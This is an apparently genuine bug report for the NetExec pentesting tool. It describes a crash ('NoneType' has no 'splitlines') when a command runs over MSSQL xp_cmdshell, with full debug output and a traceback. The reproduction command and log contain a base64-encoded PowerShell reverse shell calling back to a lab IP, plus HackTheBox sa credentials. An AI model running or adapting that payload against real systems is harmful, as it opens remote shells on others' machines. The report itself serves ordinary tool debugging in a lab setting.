AttributeError when executing some OS command over mssql #1146
Description
Describe the bug
When running some OS commands over the mssql protocol netexec crashes with "AttributeError: 'NoneType' object has no attribute 'splitlines'".
To Reproduce
I noticed this bug when using netexec to run a reverse shell command. I reproduced the issue on two different HTB machines (EscapeTwo and Signed). Even though netexec crashes the command is successfully executed. If I didn't setup a listener then the command would not crash.
The bug doesn't happen when running a simple command but crashes when running the rev shell:
Crash output with debug:
nxc mssql dc01.sequel.htb -u 'sa' -p 'MSSQLP@ssw0rd!' -x 'powershell -nop -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANAAwACcALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=' --local-auth --debug
[13:56:13] DEBUG NXC VERSION: 1.5.1 - Yippie-Ki-Yay - c3b7e4a5 - 36 netexec.py:82
DEBUG PYTHON VERSION: 3.13.12 (main, Feb 4 2026, 15:06:39) [GCC 15.2.0] netexec.py:83
DEBUG RUNNING ON: Linux Release: 6.18.12+kali-amd64 netexec.py:84
DEBUG Passed args: Namespace(version=False, threads=256, timeout=None, jitter=None, no_progress=False, log=None, verbose=False, debug=True, force_ipv6=False, dns_server=None, dns_tcp=False, dns_timeout=3, protocol='mssql', target=['dc01.sequel.htb'], username=['sa'], netexec.py:85
password=['MSSQLP@ssw0rd!'], cred_id=[], ignore_pw_decoding=False, no_bruteforce=False, continue_on_success=False, gfail_limit=None, ufail_limit=None, fail_limit=None, kerberos=False, use_kcache=False, aesKey=None, kdcHost=None, pfx_cert=None, pfx_base64=None, pfx_pass=None,
pem_cert=None, pem_key=None, module=None, module_options=[], list_modules=None, show_module_options=False, hash=[], port=1433, mssql_timeout=5, query=None, database=None, domain=None, local_auth=True, sam=False, lsa=False, no_output=False, execute='powershell -nop -e
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANAAwACcALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAk
AGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAA
ZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBh
AGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIA
ZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA=', ps_execute=None, force_ps32=False, obfs=False, amsi_bypass=None,
clear_obfscripts=False, no_encode=False, put_file=None, get_file=None, rid_brute=None)
DEBUG Protocol: mssql netexec.py:141
DEBUG Protocol Path: /home/kali/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/protocols/mssql.py netexec.py:144
DEBUG Protocol DB Path: /home/kali/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/protocols/mssql/database.py netexec.py:146
DEBUG symmetric using "pyCryptodomex" for "DES" __init__.py:55
DEBUG symmetric using "pyCryptodomex" for "TDES" __init__.py:55
DEBUG symmetric using "pyCryptodomex" for "AES" __init__.py:55
DEBUG symmetric using "pyCryptodomex" for "RC4" __init__.py:55
DEBUG Protocol Object: <class 'protocol.mssql'>, type: <class 'type'> netexec.py:149
DEBUG Protocol DB Object: <class 'protocol.database'> netexec.py:151
DEBUG DB Path: /home/kali/.nxc/workspaces/default/mssql.db netexec.py:154
DEBUG Creating ThreadPoolExecutor netexec.py:45
DEBUG Creating thread for <class 'protocol.mssql'> netexec.py:48
INFO Socket info: host=10.129.232.128, hostname=dc01.sequel.htb, kerberos=False, ipv6=False, link-local ipv6=False connection.py:175
DEBUG Kicking off proto_flow connection.py:239
DEBUG Created connection object connection.py:244
[13:56:14] DEBUG NTLM challenge: mssql.py:131
b'NTLMSSP\x00\x02\x00\x00\x00\x0c\x00\x0c\x008\x00\x00\x00\x05\x02\x89\xa2x\x03\x13\xfc\xd7\x98TK\x00\x00\x00\x00\x00\x00\x00\x00~\x00~\x00D\x00\x00\x00\n\x00cE\x00\x00\x00\x0fS\x00E\x00Q\x00U\x00E\x00L\x00\x02\x00\x0c\x00S\x00E\x00Q\x00U\x00E\x00L\x00\x01\x00\x08\x00D\x00C\x000\x001\
x00\x04\x00\x14\x00s\x00e\x00q\x00u\x00e\x00l\x00.\x00h\x00t\x00b\x00\x03\x00\x1e\x00D\x00C\x000\x001\x00.\x00s\x00e\x00q\x00u\x00e\x00l\x00.\x00h\x00t\x00b\x00\x05\x00\x14\x00s\x00e\x00q\x00u\x00e\x00l\x00.\x00h\x00t\x00b\x00\x07\x00\x08\x00U2\xc5\x9b\x1f\xb2\xdc\x01\x00\x00\x00\x00'
DEBUG sequel.htb 10.129.232.128 Windows 10 / Server 2019 Build 17763 0 database.py:91
DEBUG mssql add_host() - hosts returned: [(12, '10.129.232.128', 'DC01', 'sequel.htb', 'Windows 10 / Server 2019 Build 17763', 0)] database.py:98
DEBUG Update Hosts: [{'id': 12, 'ip': '10.129.232.128', 'hostname': 'DC01', 'domain': 'sequel.htb', 'os': 'Windows 10 / Server 2019 Build 17763', 'instances': 0}] database.py:126
INFO Resolved domain: DC01 with dns, kdcHost: 10.129.6.117 mssql.py:153
[13:56:14] INFO MSSQL 10.129.232.128 1433 DC01 Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb) (EncryptionReq:False) mssql.py:157
DEBUG Trying to authenticate using plaintext with domain connection.py:506
[13:56:14] INFO MSSQL 10.129.232.128 1433 DC01 DC01\sa:MSSQLP@ssw0rd! (Pwn3d!) mssql.py:221
DEBUG add_credential(credtype=plaintext, domain=DC01, username=sa, password=MSSQLP@ssw0rd!, pillaged_from=None) database.py:172
DEBUG Using 'ip' column for filtering database.py:116
DEBUG filter_term is an IP address: 10.129.232.128 database.py:127
DEBUG Users: [(5, 'plaintext', 'DC01', 'sa', 'MSSQLP@ssw0rd!', None)] database.py:194
DEBUG Hosts: [(5, 'plaintext', 'DC01', 'sa', 'MSSQLP@ssw0rd!', None)] database.py:199
DEBUG Calling command arguments connection.py:261
DEBUG Calling execute() connection.py:283
DEBUG get_output=True mssql.py:310
DEBUG Checking if advanced options is enabled: EXEC master.dbo.sp_configure 'advanced options'; mssqlexec.py:64
DEBUG advanced options check result: [{'name': 'show advanced options', 'minimum': 0, 'maximum': 1, 'config_value': 1, 'run_value': 1}] mssqlexec.py:67
DEBUG Option 'advanced options' is already enabled. mssqlexec.py:58
DEBUG Checking if xp_cmdshell is enabled: EXEC master.dbo.sp_configure 'xp_cmdshell'; mssqlexec.py:64
[13:56:15] DEBUG xp_cmdshell check result: [{'name': 'xp_cmdshell', 'minimum': 0, 'maximum': 1, 'config_value': 0, 'run_value': 0}] mssqlexec.py:67
DEBUG Option 'xp_cmdshell' is disabled, attempting to enable it. mssqlexec.py:53
DEBUG Executing query: EXEC master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE; mssqlexec.py:55
DEBUG Attempting to execute query: exec master..xp_cmdshell 'powershell -nop -e mssqlexec.py:20
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANAAwACcALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQ
AkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5
AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAG
QAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQA
cwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgA='
[13:56:20] ERROR Error when attempting to execute command via xp_cmdshell: timed out mssqlexec.py:30
DEBUG Option 'xp_cmdshell' was not enabled originally, attempting to disable it. mssqlexec.py:40
DEBUG Executing query: EXEC master.dbo.sp_configure 'xp_cmdshell', 0;RECONFIGURE; mssqlexec.py:42
[13:56:25] ERROR [OPSEC] Error when attempting to restore option 'xp_cmdshell': timed out mssqlexec.py:47
DEBUG Option 'advanced options' was originally enabled, leaving it enabled. mssqlexec.py:45
DEBUG Output: None mssql.py:316
[13:56:25] INFO MSSQL 10.129.232.128 1433 DC01 Executed command via mssqlexec mssql.py:324
ERROR Exception while calling proto_flow() on target dc01.sequel.htb: 'NoneType' object has no attribute 'splitlines' connection.py:188
╭───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── Traceback (most recent call last) ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ /home/kali/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/connection.py:178 in __init__ │
│ │
│ 175 │ │ self.logger.info(f"Socket info: host={self.host}, hostname={self.hostname}, │
│ kerberos={self.kerberos}, ipv6={self.is_ipv6}, link-local │
│ ipv6={self.is_link_local_ipv6}") │
│ 176 │ │ │
│ 177 │ │ try: │
│ ❱ 178 │ │ │ self.proto_flow() │
│ 179 │ │ except FileNotFoundError as e: │
│ 180 │ │ │ self.logger.error(f"File not found error on target {target}: {e}") │
│ 181 │ │ except Exception as e: │
│ │
│ /home/kali/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/connection.py:262 in proto_flow │
│ │
│ 259 │ │ │ │ │ self.call_modules() │
│ 260 │ │ │ │ else: │
│ 261 │ │ │ │ │ self.logger.debug("Calling command arguments") │
│ ❱ 262 │ │ │ │ │ self.call_cmd_args() │
│ 263 │ │ │ self.disconnect() │
│ 264 │ │
│ 265 │ def call_cmd_args(self): │
│ │
│ /home/kali/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/connection.py:284 in call_cmd_args │
│ │
│ 281 │ │ for attr, value in vars(self.args).items(): │
│ 282 │ │ │ if hasattr(self, attr) and callable(getattr(self, attr)) and value is not │
│ False and value is not None: │
│ 283 │ │ │ │ self.logger.debug(f"Calling {attr}()") │
│ ❱ 284 │ │ │ │ getattr(self, attr)() │
│ 285 │ │
│ 286 │ def call_modules(self): │
│ 287 │ │ """Calls modules and performs various actions based on the module's attributes. │
│ │
│ /home/kali/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/connection.py:97 in _decorator │
│ │
│ 94 │ │ │ if hasattr(self.args, "exec_method") and self.args.exec_method == "mmcexec": │
│ 95 │ │ │ │ return func(self, *args, **kwargs) │
│ 96 │ │ │ return None │
│ ❱ 97 │ │ return func(self, *args, **kwargs) │
│ 98 │ │
│ 99 │ return wraps(func)(_decorator) │
│ 100 │
│ │
│ /home/kali/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/nxc/protocols/mssql.py:325 in execute │
│ │
│ 322 │ │ │ │ self.logger.fail(f"Error during command execution: │
│ {self.conn.lastError}") │
│ 323 │ │ │ else: │
│ 324 │ │ │ │ self.logger.success("Executed command via mssqlexec") │
│ ❱ 325 │ │ │ │ for line in output.splitlines(): │
│ 326 │ │ │ │ │ self.logger.highlight(line.strip()) │
│ 327 │ │ return output │
│ 328 │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
AttributeError: 'NoneType' object has no attribute 'splitlines'
DEBUG Closing connection to: dc01.sequel.htb
Expected behavior
No stacktrace.
NetExec info
- OS: Kali
- Version of nxc: 1.5.1 - Yippie-Ki-Yay - c3b7e4a - 36
- Installed from: pipx